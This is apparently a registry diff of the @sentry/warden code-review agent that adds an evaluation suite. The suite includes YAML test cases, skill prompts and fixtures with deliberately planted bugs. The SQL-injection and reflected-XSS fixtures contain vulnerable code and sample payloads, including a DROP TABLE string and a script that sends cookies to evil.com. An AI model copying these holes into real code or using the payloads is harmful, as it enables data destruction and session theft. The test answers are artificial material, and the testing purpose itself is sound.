@sentry/warden 0.8.0 → 0.10.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (144) hide show
  1. package/README.md +4 -0
  2. package/conductor.json +8 -0
  3. package/dist/cli/fix.d.ts +3 -1
  4. package/dist/cli/fix.d.ts.map +1 -1
  5. package/dist/cli/fix.js +91 -59
  6. package/dist/cli/fix.js.map +1 -1
  7. package/dist/cli/main.d.ts.map +1 -1
  8. package/dist/cli/main.js +37 -9
  9. package/dist/cli/main.js.map +1 -1
  10. package/dist/cli/output/formatters.d.ts.map +1 -1
  11. package/dist/cli/output/formatters.js +3 -8
  12. package/dist/cli/output/formatters.js.map +1 -1
  13. package/dist/cli/output/ink-runner.d.ts +6 -17
  14. package/dist/cli/output/ink-runner.d.ts.map +1 -1
  15. package/dist/cli/output/ink-runner.js +124 -115
  16. package/dist/cli/output/ink-runner.js.map +1 -1
  17. package/dist/cli/output/jsonl.d.ts +7 -1
  18. package/dist/cli/output/jsonl.d.ts.map +1 -1
  19. package/dist/cli/output/jsonl.js +4 -1
  20. package/dist/cli/output/jsonl.js.map +1 -1
  21. package/dist/cli/output/reporter.d.ts +7 -3
  22. package/dist/cli/output/reporter.d.ts.map +1 -1
  23. package/dist/cli/output/reporter.js +15 -1
  24. package/dist/cli/output/reporter.js.map +1 -1
  25. package/dist/cli/output/tasks.d.ts +10 -1
  26. package/dist/cli/output/tasks.d.ts.map +1 -1
  27. package/dist/cli/output/tasks.js +127 -28
  28. package/dist/cli/output/tasks.js.map +1 -1
  29. package/dist/cli/terminal.d.ts +7 -1
  30. package/dist/cli/terminal.d.ts.map +1 -1
  31. package/dist/cli/terminal.js +31 -9
  32. package/dist/cli/terminal.js.map +1 -1
  33. package/dist/config/schema.d.ts +0 -1
  34. package/dist/config/schema.d.ts.map +1 -1
  35. package/dist/config/schema.js +1 -2
  36. package/dist/config/schema.js.map +1 -1
  37. package/dist/evals/index.d.ts +22 -0
  38. package/dist/evals/index.d.ts.map +1 -0
  39. package/dist/evals/index.js +92 -0
  40. package/dist/evals/index.js.map +1 -0
  41. package/dist/evals/judge.d.ts +12 -0
  42. package/dist/evals/judge.d.ts.map +1 -0
  43. package/dist/evals/judge.js +171 -0
  44. package/dist/evals/judge.js.map +1 -0
  45. package/dist/evals/runner.d.ts +18 -0
  46. package/dist/evals/runner.d.ts.map +1 -0
  47. package/dist/evals/runner.js +133 -0
  48. package/dist/evals/runner.js.map +1 -0
  49. package/dist/{examples → evals}/setup.d.ts.map +1 -1
  50. package/dist/evals/setup.js.map +1 -0
  51. package/dist/evals/types.d.ts +166 -0
  52. package/dist/evals/types.d.ts.map +1 -0
  53. package/dist/evals/types.js +134 -0
  54. package/dist/evals/types.js.map +1 -0
  55. package/dist/output/dedup.d.ts.map +1 -1
  56. package/dist/output/dedup.js +29 -57
  57. package/dist/output/dedup.js.map +1 -1
  58. package/dist/output/github-checks.d.ts.map +1 -1
  59. package/dist/output/github-checks.js +38 -10
  60. package/dist/output/github-checks.js.map +1 -1
  61. package/dist/output/renderer.d.ts.map +1 -1
  62. package/dist/output/renderer.js +16 -1
  63. package/dist/output/renderer.js.map +1 -1
  64. package/dist/output/stale.d.ts +1 -0
  65. package/dist/output/stale.d.ts.map +1 -1
  66. package/dist/output/stale.js +14 -8
  67. package/dist/output/stale.js.map +1 -1
  68. package/dist/sdk/analyze.d.ts +11 -0
  69. package/dist/sdk/analyze.d.ts.map +1 -1
  70. package/dist/sdk/analyze.js +185 -27
  71. package/dist/sdk/analyze.js.map +1 -1
  72. package/dist/sdk/extract.d.ts +55 -1
  73. package/dist/sdk/extract.d.ts.map +1 -1
  74. package/dist/sdk/extract.js +222 -32
  75. package/dist/sdk/extract.js.map +1 -1
  76. package/dist/sdk/haiku.d.ts +20 -0
  77. package/dist/sdk/haiku.d.ts.map +1 -1
  78. package/dist/sdk/haiku.js +159 -77
  79. package/dist/sdk/haiku.js.map +1 -1
  80. package/dist/sdk/model-pricing.json +6 -12
  81. package/dist/sdk/pricing.d.ts +5 -0
  82. package/dist/sdk/pricing.d.ts.map +1 -1
  83. package/dist/sdk/pricing.js +11 -2
  84. package/dist/sdk/pricing.js.map +1 -1
  85. package/dist/sdk/prompt.d.ts.map +1 -1
  86. package/dist/sdk/prompt.js +4 -1
  87. package/dist/sdk/prompt.js.map +1 -1
  88. package/dist/sdk/runner.d.ts +2 -2
  89. package/dist/sdk/runner.d.ts.map +1 -1
  90. package/dist/sdk/runner.js +1 -1
  91. package/dist/sdk/runner.js.map +1 -1
  92. package/dist/sdk/types.d.ts +9 -3
  93. package/dist/sdk/types.d.ts.map +1 -1
  94. package/dist/sdk/types.js +1 -1
  95. package/dist/sdk/types.js.map +1 -1
  96. package/dist/sdk/usage.d.ts +5 -0
  97. package/dist/sdk/usage.d.ts.map +1 -1
  98. package/dist/sdk/usage.js +11 -3
  99. package/dist/sdk/usage.js.map +1 -1
  100. package/dist/sentry.d.ts +15 -0
  101. package/dist/sentry.d.ts.map +1 -1
  102. package/dist/sentry.js +40 -1
  103. package/dist/sentry.js.map +1 -1
  104. package/dist/triggers/matcher.d.ts +2 -2
  105. package/dist/triggers/matcher.d.ts.map +1 -1
  106. package/dist/triggers/matcher.js +10 -8
  107. package/dist/triggers/matcher.js.map +1 -1
  108. package/dist/types/index.d.ts +19 -0
  109. package/dist/types/index.d.ts.map +1 -1
  110. package/dist/types/index.js +25 -0
  111. package/dist/types/index.js.map +1 -1
  112. package/dist/utils/async.d.ts +14 -0
  113. package/dist/utils/async.d.ts.map +1 -1
  114. package/dist/utils/async.js +33 -0
  115. package/dist/utils/async.js.map +1 -1
  116. package/dist/utils/index.d.ts +1 -1
  117. package/dist/utils/index.d.ts.map +1 -1
  118. package/dist/utils/index.js +1 -1
  119. package/dist/utils/index.js.map +1 -1
  120. package/evals/README.md +154 -0
  121. package/evals/bug-detection.yaml +56 -0
  122. package/evals/fixtures/ignores-style-issues/utils.ts +48 -0
  123. package/evals/fixtures/missing-await/cache.ts +45 -0
  124. package/evals/fixtures/null-property-access/handler.ts +36 -0
  125. package/evals/fixtures/off-by-one/paginator.ts +38 -0
  126. package/evals/fixtures/sql-injection/api.ts +59 -0
  127. package/evals/fixtures/stale-closure/counter.tsx +33 -0
  128. package/evals/fixtures/wrong-comparison/validator.ts +52 -0
  129. package/evals/fixtures/xss-reflected/server.ts +55 -0
  130. package/evals/precision.yaml +15 -0
  131. package/evals/security-scanning.yaml +24 -0
  132. package/evals/skills/bug-detection.md +33 -0
  133. package/evals/skills/precision.md +18 -0
  134. package/evals/skills/security-scanning.md +32 -0
  135. package/package.json +4 -2
  136. package/plugins/warden/skills/warden/references/config-schema.md +4 -2
  137. package/plugins/warden/skills/warden/references/configuration.md +2 -2
  138. package/dist/examples/index.d.ts +0 -50
  139. package/dist/examples/index.d.ts.map +0 -1
  140. package/dist/examples/index.js +0 -104
  141. package/dist/examples/index.js.map +0 -1
  142. package/dist/examples/setup.js.map +0 -1
  143. /package/dist/{examples → evals}/setup.d.ts +0 -0
  144. /package/dist/{examples → evals}/setup.js +0 -0
@@ -0,0 +1,56 @@
1
+ skill: skills/bug-detection.md
2
+
3
+ evals:
4
+ - name: null-property-access
5
+ given: code that accesses properties on an array .find() result without null checking
6
+ files:
7
+ - fixtures/null-property-access/handler.ts
8
+ should_find:
9
+ - finding: accessing .name and .profile.avatar on a potentially undefined user object from Array.find()
10
+ severity: high
11
+ should_not_find:
12
+ - style, formatting, or naming issues
13
+ - the lack of try/catch around the fetch call
14
+
15
+ - name: off-by-one
16
+ given: pagination logic that uses Math.floor instead of Math.ceil, skipping the last page
17
+ files:
18
+ - fixtures/off-by-one/paginator.ts
19
+ should_find:
20
+ - finding: off-by-one error in page count calculation that loses the last page when totalItems is not evenly divisible by pageSize
21
+ severity: medium
22
+ should_not_find:
23
+ - use of any[] type
24
+ - missing error handling
25
+
26
+ - name: missing-await
27
+ given: async cache lookup missing await, causing a Promise object to be used as a truthy value
28
+ files:
29
+ - fixtures/missing-await/cache.ts
30
+ should_find:
31
+ - finding: missing await on loadFromCache() call, so cached is always a truthy Promise and the function never actually fetches fresh data
32
+ severity: high
33
+ should_not_find:
34
+ - console.log statements
35
+ - missing return type annotations
36
+
37
+ - name: wrong-comparison
38
+ given: permission check using <= instead of >=, inverting the access control logic
39
+ files:
40
+ - fixtures/wrong-comparison/validator.ts
41
+ should_find:
42
+ - finding: comparison operator is <= instead of >=, granting access to lower-privilege users while denying higher-privilege users
43
+ severity: high
44
+ should_not_find:
45
+ - hardcoded role strings
46
+ - suggestion to use an enum for roles
47
+
48
+ - name: stale-closure
49
+ given: React useEffect with setInterval that captures count in a stale closure
50
+ files:
51
+ - fixtures/stale-closure/counter.tsx
52
+ should_find:
53
+ - finding: "stale closure: setInterval callback captures initial count value and never sees updates, so the counter always sets the same value"
54
+ severity: high
55
+ should_not_find:
56
+ - TypeScript type annotation issues
@@ -0,0 +1,48 @@
1
+ // This code is functionally correct but has style issues.
2
+ // A precision-focused eval: the skill should NOT report any of these as bugs.
3
+
4
+ // Inconsistent naming convention (camelCase vs snake_case)
5
+ export function calculate_total(items: number[]): number {
6
+ let runningTotal = 0;
7
+ for (let i = 0; i < items.length; i++) {
8
+ runningTotal = runningTotal + items[i]!;
9
+ }
10
+ return runningTotal;
11
+ }
12
+
13
+ // Verbose conditional (could be simplified but is correct)
14
+ export function isEligible(age: number, hasConsent: boolean): boolean {
15
+ if (age >= 18) {
16
+ if (hasConsent === true) {
17
+ return true;
18
+ } else {
19
+ return false;
20
+ }
21
+ } else {
22
+ return false;
23
+ }
24
+ }
25
+
26
+ // Missing JSDoc, long parameter list, but functionally correct
27
+ export function formatAddress(
28
+ street: string,
29
+ city: string,
30
+ state: string,
31
+ zip: string,
32
+ country: string
33
+ ): string {
34
+ const parts = [street, city, state, zip, country];
35
+ return parts.filter((p) => p.length > 0).join(', ');
36
+ }
37
+
38
+ // Magic numbers but correct behavior
39
+ export function calculateDiscount(price: number, quantity: number): number {
40
+ if (quantity >= 100) {
41
+ return price * 0.8;
42
+ } else if (quantity >= 50) {
43
+ return price * 0.9;
44
+ } else if (quantity >= 10) {
45
+ return price * 0.95;
46
+ }
47
+ return price;
48
+ }
@@ -0,0 +1,45 @@
1
+ interface CacheEntry {
2
+ key: string;
3
+ value: string;
4
+ expiresAt: number;
5
+ }
6
+
7
+ const store = new Map<string, CacheEntry>();
8
+
9
+ async function saveToCache(key: string, value: string, ttlMs: number): Promise<void> {
10
+ // Simulate async storage (e.g., Redis, database)
11
+ await new Promise((resolve) => setTimeout(resolve, 1));
12
+ store.set(key, {
13
+ key,
14
+ value,
15
+ expiresAt: Date.now() + ttlMs,
16
+ });
17
+ }
18
+
19
+ async function loadFromCache(key: string): Promise<string | null> {
20
+ await new Promise((resolve) => setTimeout(resolve, 1));
21
+ const entry = store.get(key);
22
+ if (!entry) return null;
23
+ if (Date.now() > entry.expiresAt) {
24
+ store.delete(key);
25
+ return null;
26
+ }
27
+ return entry.value;
28
+ }
29
+
30
+ export async function getOrFetchData(key: string, fetchFn: () => Promise<string>): Promise<string> {
31
+ // Bug: missing await on loadFromCache. The result `cached` will be a
32
+ // Promise, which is truthy, so the function always returns a Promise
33
+ // object (as a string) instead of the actual cached value.
34
+ const cached = loadFromCache(key);
35
+
36
+ if (cached) {
37
+ console.log('Cache hit:', key);
38
+ return cached as unknown as string;
39
+ }
40
+
41
+ console.log('Cache miss:', key);
42
+ const fresh = await fetchFn();
43
+ await saveToCache(key, fresh, 60_000);
44
+ return fresh;
45
+ }
@@ -0,0 +1,36 @@
1
+ interface User {
2
+ id: string;
3
+ name: string;
4
+ email: string;
5
+ profile: {
6
+ avatar: string;
7
+ bio: string;
8
+ };
9
+ }
10
+
11
+ interface ApiResponse {
12
+ users: User[];
13
+ total: number;
14
+ }
15
+
16
+ async function fetchUsers(endpoint: string): Promise<ApiResponse> {
17
+ const response = await fetch(endpoint);
18
+ return response.json() as Promise<ApiResponse>;
19
+ }
20
+
21
+ export async function getUserDisplayName(userId: string): Promise<string> {
22
+ const data = await fetchUsers(`/api/users?id=${userId}`);
23
+ const user = data.users.find((u) => u.id === userId);
24
+
25
+ // Bug: user could be undefined if not found in the array,
26
+ // but we access .name without checking
27
+ const displayName = user.name;
28
+ const avatarUrl = user.profile.avatar;
29
+
30
+ return `${displayName} (${avatarUrl})`;
31
+ }
32
+
33
+ export async function getTeamMembers(teamId: string): Promise<string[]> {
34
+ const data = await fetchUsers(`/api/teams/${teamId}/members`);
35
+ return data.users.map((u) => u.name);
36
+ }
@@ -0,0 +1,38 @@
1
+ export interface PaginatedResult<T> {
2
+ items: T[];
3
+ page: number;
4
+ totalItems: number;
5
+ pageSize: number;
6
+ }
7
+
8
+ /**
9
+ * Fetch all pages of results from a paginated API endpoint.
10
+ * Collects items from every page and returns them as a flat array.
11
+ */
12
+ export async function fetchAllPages<T>(
13
+ fetchPage: (page: number) => Promise<PaginatedResult<T>>
14
+ ): Promise<T[]> {
15
+ const firstPage = await fetchPage(1);
16
+ const allItems: T[] = [...firstPage.items];
17
+
18
+ // Bug: Math.floor loses the last page when totalItems is not evenly
19
+ // divisible by pageSize. E.g., 25 items / 10 per page = 2.5, floored
20
+ // to 2, so page 3 (items 21-25) is never fetched.
21
+ const totalPages = Math.floor(firstPage.totalItems / firstPage.pageSize);
22
+
23
+ for (let page = 2; page <= totalPages; page++) {
24
+ const result = await fetchPage(page);
25
+ allItems.push(...result.items);
26
+ }
27
+
28
+ return allItems;
29
+ }
30
+
31
+ /**
32
+ * Get a specific page range of results.
33
+ */
34
+ export function getPageRange(totalItems: number, pageSize: number, currentPage: number): { start: number; end: number } {
35
+ const start = (currentPage - 1) * pageSize;
36
+ const end = Math.min(start + pageSize, totalItems);
37
+ return { start, end };
38
+ }
@@ -0,0 +1,59 @@
1
+ interface DbConnection {
2
+ query(sql: string): Promise<Record<string, unknown>[]>;
3
+ }
4
+
5
+ function getConnection(): DbConnection {
6
+ // In production this returns a real DB connection
7
+ return {
8
+ query: async (sql: string) => {
9
+ console.log('Executing:', sql);
10
+ return [];
11
+ },
12
+ };
13
+ }
14
+
15
+ interface SearchParams {
16
+ name?: string;
17
+ email?: string;
18
+ role?: string;
19
+ }
20
+
21
+ /**
22
+ * Search for users matching the given criteria.
23
+ * Builds a dynamic WHERE clause from the search parameters.
24
+ */
25
+ export async function searchUsers(params: SearchParams): Promise<Record<string, unknown>[]> {
26
+ const db = getConnection();
27
+ const conditions: string[] = [];
28
+
29
+ if (params.name) {
30
+ // Bug: Direct string interpolation of user input into SQL query.
31
+ // An attacker can pass name = "'; DROP TABLE users; --" to execute
32
+ // arbitrary SQL.
33
+ conditions.push(`name = '${params.name}'`);
34
+ }
35
+ if (params.email) {
36
+ conditions.push(`email = '${params.email}'`);
37
+ }
38
+ if (params.role) {
39
+ conditions.push(`role = '${params.role}'`);
40
+ }
41
+
42
+ const whereClause = conditions.length > 0
43
+ ? `WHERE ${conditions.join(' AND ')}`
44
+ : '';
45
+
46
+ const sql = `SELECT id, name, email, role FROM users ${whereClause}`;
47
+ return db.query(sql);
48
+ }
49
+
50
+ /**
51
+ * Get a user by their ID (this one is safe - uses parameterized approach).
52
+ */
53
+ export async function getUserById(id: number): Promise<Record<string, unknown> | null> {
54
+ const db = getConnection();
55
+ // This is safe because we validate the type
56
+ if (!Number.isInteger(id) || id <= 0) return null;
57
+ const results = await db.query(`SELECT * FROM users WHERE id = ${id}`);
58
+ return results[0] ?? null;
59
+ }
@@ -0,0 +1,33 @@
1
+ import { useState, useEffect } from 'react';
2
+
3
+ interface CounterProps {
4
+ initialValue: number;
5
+ step: number;
6
+ intervalMs: number;
7
+ }
8
+
9
+ /**
10
+ * An auto-incrementing counter that ticks at a given interval.
11
+ */
12
+ export function AutoCounter({ initialValue, step, intervalMs }: CounterProps) {
13
+ const [count, setCount] = useState(initialValue);
14
+
15
+ useEffect(() => {
16
+ // Bug: This closure captures `count` once at mount time.
17
+ // Every tick reads the same stale `count` value and sets
18
+ // count to initialValue + step, over and over. The counter
19
+ // never actually increments past the first tick.
20
+ const id = setInterval(() => {
21
+ setCount(count + step);
22
+ }, intervalMs);
23
+
24
+ return () => clearInterval(id);
25
+ // eslint-disable-next-line react-hooks/exhaustive-deps
26
+ }, []);
27
+
28
+ return (
29
+ <div>
30
+ <span data-testid="count">{count}</span>
31
+ </div>
32
+ );
33
+ }
@@ -0,0 +1,52 @@
1
+ interface Permission {
2
+ resource: string;
3
+ action: 'read' | 'write' | 'delete';
4
+ role: string;
5
+ }
6
+
7
+ const ROLE_HIERARCHY: Record<string, number> = {
8
+ viewer: 0,
9
+ editor: 1,
10
+ admin: 2,
11
+ superadmin: 3,
12
+ };
13
+
14
+ /**
15
+ * Check if a user's role has sufficient permissions for an action.
16
+ * Returns true if the user is allowed to perform the action.
17
+ */
18
+ export function hasPermission(userRole: string, requiredRole: string): boolean {
19
+ const userLevel = ROLE_HIERARCHY[userRole] ?? 0;
20
+ const requiredLevel = ROLE_HIERARCHY[requiredRole] ?? 0;
21
+
22
+ // Bug: should be >= but uses <=, so only users with LOWER privilege
23
+ // than required are granted access (e.g., a viewer can perform admin
24
+ // actions, but an admin cannot).
25
+ return userLevel <= requiredLevel;
26
+ }
27
+
28
+ /**
29
+ * Filter a list of permissions to only those a user can perform.
30
+ */
31
+ export function filterAllowedActions(
32
+ userRole: string,
33
+ permissions: Permission[]
34
+ ): Permission[] {
35
+ return permissions.filter((p) => hasPermission(userRole, p.role));
36
+ }
37
+
38
+ /**
39
+ * Validate that a user can perform a specific action on a resource.
40
+ */
41
+ export function validateAccess(
42
+ userRole: string,
43
+ resource: string,
44
+ action: string,
45
+ permissions: Permission[]
46
+ ): boolean {
47
+ const matching = permissions.find(
48
+ (p) => p.resource === resource && p.action === action
49
+ );
50
+ if (!matching) return false;
51
+ return hasPermission(userRole, matching.role);
52
+ }
@@ -0,0 +1,55 @@
1
+ /**
2
+ * Simple HTTP request handler for a search page.
3
+ * Renders search results with the query term displayed back to the user.
4
+ */
5
+ export function handleSearchRequest(url: string): string {
6
+ const parsed = new URL(url, 'http://localhost:3000');
7
+ const query = parsed.searchParams.get('q') ?? '';
8
+ const page = parseInt(parsed.searchParams.get('page') ?? '1', 10);
9
+
10
+ // Simulate search results
11
+ const results = performSearch(query, page);
12
+
13
+ // Bug: The query string from the URL is interpolated directly into HTML
14
+ // without escaping. An attacker can craft a URL like:
15
+ // /search?q=<script>document.location='http://evil.com/?c='+document.cookie</script>
16
+ // and the script will execute in the victim's browser.
17
+ return `
18
+ <!DOCTYPE html>
19
+ <html>
20
+ <head><title>Search Results</title></head>
21
+ <body>
22
+ <h1>Search Results</h1>
23
+ <p>Showing results for: <strong>${query}</strong></p>
24
+ <p>Page ${page} of ${results.totalPages}</p>
25
+ <ul>
26
+ ${results.items.map((item) => `<li>${escapeHtml(item.title)}</li>`).join('\n')}
27
+ </ul>
28
+ </body>
29
+ </html>
30
+ `;
31
+ }
32
+
33
+ function escapeHtml(text: string): string {
34
+ return text
35
+ .replace(/&/g, '&amp;')
36
+ .replace(/</g, '&lt;')
37
+ .replace(/>/g, '&gt;')
38
+ .replace(/"/g, '&quot;');
39
+ }
40
+
41
+ interface SearchResult {
42
+ items: { title: string; url: string }[];
43
+ totalPages: number;
44
+ }
45
+
46
+ function performSearch(query: string, page: number): SearchResult {
47
+ // Stub implementation
48
+ return {
49
+ items: [
50
+ { title: `Result for "${query}" - item 1`, url: '/result/1' },
51
+ { title: `Result for "${query}" - item 2`, url: '/result/2' },
52
+ ],
53
+ totalPages: Math.max(1, page),
54
+ };
55
+ }
@@ -0,0 +1,15 @@
1
+ skill: skills/precision.md
2
+
3
+ evals:
4
+ - name: ignores-style-issues
5
+ given: functionally correct code with style issues (mixed naming conventions, verbose conditionals, magic numbers)
6
+ files:
7
+ - fixtures/ignores-style-issues/utils.ts
8
+ should_find:
9
+ - finding: "no bugs: the code is functionally correct despite having style issues, so zero or only info-level findings are expected"
10
+ required: false
11
+ should_not_find:
12
+ - inconsistent naming convention (snake_case vs camelCase)
13
+ - missing JSDoc comments
14
+ - verbose conditional that could be simplified
15
+ - magic numbers in discount calculation
@@ -0,0 +1,24 @@
1
+ skill: skills/security-scanning.md
2
+
3
+ evals:
4
+ - name: sql-injection
5
+ given: SQL query built via string interpolation with user-supplied search parameters
6
+ files:
7
+ - fixtures/sql-injection/api.ts
8
+ should_find:
9
+ - finding: "SQL injection: user input from params.name, params.email, and params.role is directly interpolated into SQL query without parameterization"
10
+ severity: critical
11
+ should_not_find:
12
+ - the getConnection helper implementation
13
+ - missing email format validation as the primary issue
14
+
15
+ - name: xss-reflected
16
+ given: HTML template that renders URL query parameter directly into page without escaping
17
+ files:
18
+ - fixtures/xss-reflected/server.ts
19
+ should_find:
20
+ - finding: "reflected XSS: the query parameter from the URL is interpolated into HTML via template literal without calling escapeHtml()"
21
+ severity: critical
22
+ should_not_find:
23
+ - hardcoded port number
24
+ - missing HTTPS as the primary issue
@@ -0,0 +1,33 @@
1
+ ---
2
+ name: eval-bug-detection
3
+ description: Test skill for bug detection evals. Finds logic errors, null handling bugs, async issues, and edge cases.
4
+ ---
5
+
6
+ You are an expert bug hunter analyzing code changes.
7
+
8
+ ## What to Report
9
+
10
+ Find bugs that will cause incorrect behavior at runtime:
11
+
12
+ - Null/undefined property access without guards
13
+ - Off-by-one and boundary errors
14
+ - Missing await on async operations
15
+ - Wrong comparison operators (< vs <=, && vs ||)
16
+ - Stale closures capturing outdated values
17
+ - Type coercion causing unexpected behavior
18
+
19
+ ## What NOT to Report
20
+
21
+ - Style or formatting preferences
22
+ - Missing error handling that "might" matter
23
+ - Performance concerns (unless causing incorrect behavior)
24
+ - Unused variables or dead code
25
+ - Missing tests or documentation
26
+ - Security vulnerabilities (separate concern)
27
+
28
+ ## Output Requirements
29
+
30
+ For each bug, provide:
31
+ - The exact file and line
32
+ - What incorrect behavior occurs
33
+ - What specific input or condition triggers it
@@ -0,0 +1,18 @@
1
+ ---
2
+ name: eval-precision
3
+ description: Test skill for precision evals. Only reports logic bugs, nothing else.
4
+ ---
5
+
6
+ You are a strict bug detector. You ONLY report provable logic bugs.
7
+
8
+ ## Rules
9
+
10
+ 1. Only report bugs that WILL cause incorrect behavior
11
+ 2. You must be able to construct a specific input that triggers failure
12
+ 3. Do NOT report style, formatting, naming, or documentation issues
13
+ 4. Do NOT report missing error handling
14
+ 5. Do NOT report performance concerns
15
+ 6. Do NOT report security vulnerabilities
16
+ 7. If the code is correct, return an empty findings array
17
+
18
+ Be extremely conservative. When in doubt, do not report.
@@ -0,0 +1,32 @@
1
+ ---
2
+ name: eval-security-scanning
3
+ description: Test skill for security scanning evals. Finds injection, XSS, and other OWASP Top 10 vulnerabilities.
4
+ ---
5
+
6
+ You are a security expert analyzing code changes for vulnerabilities.
7
+
8
+ ## What to Report
9
+
10
+ Find security vulnerabilities that could be exploited:
11
+
12
+ - SQL injection (unsanitized input in queries)
13
+ - Cross-site scripting (XSS) - reflected and stored
14
+ - Command injection
15
+ - Path traversal
16
+ - Authentication/authorization bypasses
17
+ - Insecure cryptography
18
+
19
+ ## What NOT to Report
20
+
21
+ - Code quality or style issues
22
+ - Performance concerns
23
+ - Missing but non-security error handling
24
+ - Hardcoded configuration values (unless they are secrets)
25
+ - Missing HTTPS (unless specifically relevant)
26
+
27
+ ## Output Requirements
28
+
29
+ For each vulnerability:
30
+ - The exact file and line
31
+ - The attack vector (how it could be exploited)
32
+ - Severity based on exploitability and impact
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "@sentry/warden",
3
- "version": "0.8.0",
3
+ "version": "0.10.0",
4
4
  "description": "Event-driven agent that reacts to GitHub events and executes skills via Claude Code SDK",
5
5
  "type": "module",
6
6
  "main": "dist/index.js",
@@ -12,7 +12,7 @@
12
12
  "pre-commit": "pnpm lint-staged && pnpm typecheck"
13
13
  },
14
14
  "lint-staged": {
15
- "*.ts": [
15
+ "src/**/*.ts": [
16
16
  "eslint --fix"
17
17
  ],
18
18
  "docs/**/*.astro": [
@@ -50,6 +50,7 @@
50
50
  "nanoid": "^5.1.6",
51
51
  "react": "^18.3.1",
52
52
  "smol-toml": "^1.6.0",
53
+ "yaml": "^2.8.2",
53
54
  "zod": "^4.3.6"
54
55
  },
55
56
  "devDependencies": {
@@ -79,6 +80,7 @@
79
80
  "test": "vitest run",
80
81
  "test:watch": "vitest",
81
82
  "test:examples": "vitest run --config vitest.integration.config.ts",
83
+ "test:evals": "vitest run --config vitest.evals.config.ts",
82
84
  "typecheck": "tsc --noEmit",
83
85
  "update-pricing": "tsx scripts/update-pricing.ts"
84
86
  }
@@ -69,8 +69,10 @@ fixBranchPrefix = "security-fix" # Branch name prefix
69
69
 
70
70
  **Trigger types:**
71
71
  - `pull_request` - Triggers on PR events
72
- - `local` - Triggers on local CLI runs
73
- - `schedule` - Triggers on cron schedule (GitHub Action)
72
+ - `local` - Local CLI only (will not run in CI)
73
+ - `schedule` - Cron schedule (GitHub Action only)
74
+
75
+ All skills run locally regardless of trigger type. Skills with no triggers run everywhere (wildcard). Use `type = "local"` for skills that should *only* run locally.
74
76
 
75
77
  **Actions (for pull_request):**
76
78
  - `opened`, `synchronize`, `reopened`, `closed`
@@ -21,7 +21,7 @@ actions = ["opened", "synchronize"]
21
21
 
22
22
  ## Skill Configuration
23
23
 
24
- Skills define what to analyze and when. Each skill requires a name and at least one trigger:
24
+ Skills define what to analyze and when. Each skill requires a name. Triggers are optional skills with no triggers run everywhere (PR, local, schedule). All skills run locally regardless of trigger type.
25
25
 
26
26
  ```toml
27
27
  [[skills]]
@@ -36,7 +36,7 @@ type = "pull_request"
36
36
  actions = ["opened", "synchronize"]
37
37
  ```
38
38
 
39
- **Trigger types:** `pull_request`, `local`, `schedule`
39
+ **Trigger types:** `pull_request`, `local` (local-only), `schedule` (CI-only)
40
40
 
41
41
  **Actions (pull_request):** `opened`, `synchronize`, `reopened`, `closed`
42
42
 
@@ -1,50 +0,0 @@
1
- import { z } from 'zod';
2
- /**
3
- * Schema for expected findings in _meta.json
4
- */
5
- export declare const ExpectedFindingSchema: z.ZodObject<{
6
- severity: z.ZodEnum<{
7
- critical: "critical";
8
- high: "high";
9
- medium: "medium";
10
- low: "low";
11
- info: "info";
12
- }>;
13
- pattern: z.ZodString;
14
- file: z.ZodOptional<z.ZodString>;
15
- }, z.core.$strip>;
16
- export type ExpectedFinding = z.infer<typeof ExpectedFindingSchema>;
17
- /**
18
- * Schema for _meta.json files
19
- */
20
- export declare const ExampleMetaSchema: z.ZodObject<{
21
- skill: z.ZodString;
22
- description: z.ZodString;
23
- expected: z.ZodArray<z.ZodObject<{
24
- severity: z.ZodEnum<{
25
- critical: "critical";
26
- high: "high";
27
- medium: "medium";
28
- low: "low";
29
- info: "info";
30
- }>;
31
- pattern: z.ZodString;
32
- file: z.ZodOptional<z.ZodString>;
33
- }, z.core.$strip>>;
34
- }, z.core.$strip>;
35
- export type ExampleMeta = z.infer<typeof ExampleMetaSchema>;
36
- /**
37
- * Discover all examples with _meta.json files.
38
- * Returns an array of absolute paths to example directories.
39
- */
40
- export declare function discoverExamples(baseDir?: string): string[];
41
- /**
42
- * Load and validate a _meta.json file from an example directory.
43
- */
44
- export declare function loadExample(dir: string): ExampleMeta;
45
- /**
46
- * Get all source files in an example directory (excludes _meta.json).
47
- * Returns relative paths suitable for use with buildFileEventContext.
48
- */
49
- export declare function getExampleFiles(dir: string): string[];
50
- //# sourceMappingURL=index.d.ts.map
@@ -1 +0,0 @@
1
- {"version":3,"file":"index.d.ts","sourceRoot":"","sources":["../../src/examples/index.ts"],"names":[],"mappings":"AAEA,OAAO,EAAE,CAAC,EAAE,MAAM,KAAK,CAAC;AAGxB;;GAEG;AACH,eAAO,MAAM,qBAAqB;;;;;;;;;;iBAIhC,CAAC;AACH,MAAM,MAAM,eAAe,GAAG,CAAC,CAAC,KAAK,CAAC,OAAO,qBAAqB,CAAC,CAAC;AAEpE;;GAEG;AACH,eAAO,MAAM,iBAAiB;;;;;;;;;;;;;;iBAI5B,CAAC;AACH,MAAM,MAAM,WAAW,GAAG,CAAC,CAAC,KAAK,CAAC,OAAO,iBAAiB,CAAC,CAAC;AAU5D;;;GAGG;AACH,wBAAgB,gBAAgB,CAAC,OAAO,CAAC,EAAE,MAAM,GAAG,MAAM,EAAE,CA6B3D;AAED;;GAEG;AACH,wBAAgB,WAAW,CAAC,GAAG,EAAE,MAAM,GAAG,WAAW,CA4BpD;AAED;;;GAGG;AACH,wBAAgB,eAAe,CAAC,GAAG,EAAE,MAAM,GAAG,MAAM,EAAE,CAgBrD"}